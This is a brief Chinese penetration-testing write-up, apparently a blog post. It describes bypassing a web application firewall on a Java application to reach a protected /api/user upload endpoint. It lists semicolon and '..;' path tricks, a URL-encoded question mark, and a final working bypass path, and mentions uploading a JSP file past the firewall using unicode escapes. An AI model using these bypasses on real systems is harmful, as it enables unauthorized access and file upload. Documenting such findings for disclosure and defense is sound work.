第⼀次⻅这样的waf觉得挺有意思的

java的框架存在两处权限绕过

第⼀处

/xxx/../api/user

第二处

/api/user;1.js

本着直接打完交洞的想法使⽤第⼆种权限绕过⽅式没想到看到了如下界⾯

啥也没干框框一顿拦，头⼀次⻅拦我分号，就连阿⾥云waf也不这么拦我啊

/api/user;?upload=file 拦截

试试…

/xxx/../api/user 拦截

/xxx/..;/api/use 拦截

giao!各种编码、参数污染、垃圾数据包都被拦了

还是回到分号和…上

/xxx/api/user; 拦截

/xxx/api/user?; 不拦

但是这样不能使⽤;1.js绕，因为getRequestURI()是获取不到问号后⾯的那把问号编码呢

/xxx/api/user%3f;

但是这样就匹配不到我原来的路由也没⽤。然后我⼜测试了

/xxx/%3f/../../api/user 被拦

此时想到再⽤..;

因为之前测阿⾥云waf的时候发现../拦截..;/不拦截

那么这个waf可能是拦截../和;

分号可以⽤问号编码绕过然后我再插⼊分号不就绕过了

/xxx/%3f/..;/..;/api/user

接下来就可以正常上传了

然后上传jsp⼜遇到waf了，⽤⼀个双引号和java unicode特性绕了